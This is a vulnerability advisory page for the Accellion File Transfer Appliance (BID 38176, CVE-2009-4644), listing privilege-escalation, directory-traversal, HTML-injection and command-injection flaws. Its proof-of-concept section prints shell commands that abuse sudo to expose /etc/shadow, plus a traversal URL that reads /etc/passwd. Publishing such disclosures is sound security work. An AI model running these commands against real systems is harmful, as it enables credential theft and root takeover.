Accellion File Transfer Appliance Multiple Remote Vulnerabilities
BID:38176
Info
Accellion File Transfer Appliance Multiple Remote Vulnerabilities
| Bugtraq ID: | 38176 |
| Class: | Unknown |
| CVE: |
CVE-2009-4644 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 10 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Tim Brown - Portcullis Computer Security Ltd |
| Vulnerable: |
Accellion File Transfer FTA_7_0_259 Accellion File Transfer FTA_7_0_189 Accellion File Transfer FTA_7_0_178 Accellion File Transfer FTA_7_0_135 Accellion File Transfer 7_0_135 |
| Not Vulnerable: |
Accellion File Transfer FTA_8_0_105 Accellion File Transfer FTA_7_0_296 |
Discussion
Accellion File Transfer Appliance Multiple Remote Vulnerabilities
Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
- Multiple privilege-escalation issues
- A directory-traversal issue
- An HTML-injection issue
- A remote command-injection issue
An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.
Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
- Multiple privilege-escalation issues
- A directory-traversal issue
- An HTML-injection issue
- A remote command-injection issue
An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.
Exploit / POC
Accellion File Transfer Appliance Multiple Remote Vulnerabilities
An attacker can use readily available network utilities to exploit some of these issues. For the HTML-injection and directory-traversal issues, the attacker can use a browser.
The following proofs of concept are available:
sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp
sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf
sh-2.05b$ sudo /usr/local/bin/admin.pl
https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd
An attacker can use readily available network utilities to exploit some of these issues. For the HTML-injection and directory-traversal issues, the attacker can use a browser.
The following proofs of concept are available:
sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp
sh-2.05b$ ln /etc/shadow /home/admin/temp
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf
sh-2.05b$ sudo /usr/local/bin/admin.pl
https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd
Solution / Fix
Accellion File Transfer Appliance Multiple Remote Vulnerabilities
Solution:
The vendor has released an update. Please contact the vendor for details.
Solution:
The vendor has released an update. Please contact the vendor for details.
References
Accellion File Transfer Appliance Multiple Remote Vulnerabilities
References:
References:
- Portcullis Security Advisory - 09-009 (Porcullis)
- Portcullis Security Advisory - 09-010 (Portcullis)
- Portcullis Security Advisory - 09-011 (Portcullis)
- Vendor Homepage (Accellion)